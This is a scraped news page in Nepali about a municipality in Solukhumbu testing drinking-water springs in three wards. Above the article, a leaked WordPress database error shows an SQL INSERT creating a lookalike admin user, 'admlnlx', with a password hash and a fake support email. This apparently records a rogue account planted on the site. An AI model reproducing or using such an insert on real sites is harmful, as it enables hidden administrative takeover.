WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRntsoG8mRheJCe1d8wtKK5.dLEie5/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:06:49', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १२ जेष्ठ, सोलुखुम्बु । सोलुदुधकुण्ड नगरपालिका सोलुखुम्बु सल्लेरिले शनिबार जिल्ला अस्पातल फाप्लुको प्राबिधिक टोली सहित नगरपालिकाका ३ वटा वडाको पानीको परीक्षण गरेको छ । वडा नम्बर ८, ९ र १० मा रहेको मुहानको पानी परीक्षण गरिएको हो ।
नगरपालिकाले वडा न ८, ९ र १० मा रहेको पानीको मुहानको परिक्षाण गरेको हो । पानीमा कोलिफर्मको मात्रा, पानीको पि.एच, पानीको धमिलो पानीको अवस्थाको बारेमा जानकारी लिनका लागि परीक्षण सुरु गरिएको हो । पहिलो चरणमा ३ वडाको पानीको परीक्षण गरिएको र अरु वडाको पानीको अवस्थाका विषयमा पनि क्रमश परीक्षण गरिने नगरपालिकाका स्वाथ्य संयोजक चमर मगरले बताए ।
नगर र गाउँपालिकमा पानीको गुणस्तर मापनको कार्य प्रदेश एकमा नै यो पहिलो भएको संयोजक मगरले बताए । हिजो शनिबार परीक्षण गरिएको पानीको नतिजा सोमबार आउने मगरले बताए ।
परिक्षाणको लागि पानीलाई मेसिनमा २४ घण्टा राख्नु पर्ने भएकाले त्यसको नतिजा आउन केहि समय लाग्ने उहाको भनाइ छ । नगरपालिकाका सबै ११ वटै वडामा खानेपानीको परीक्षण गरिने सोलुधुधकुन्ड नगरपालिकाले जनाएको छ ।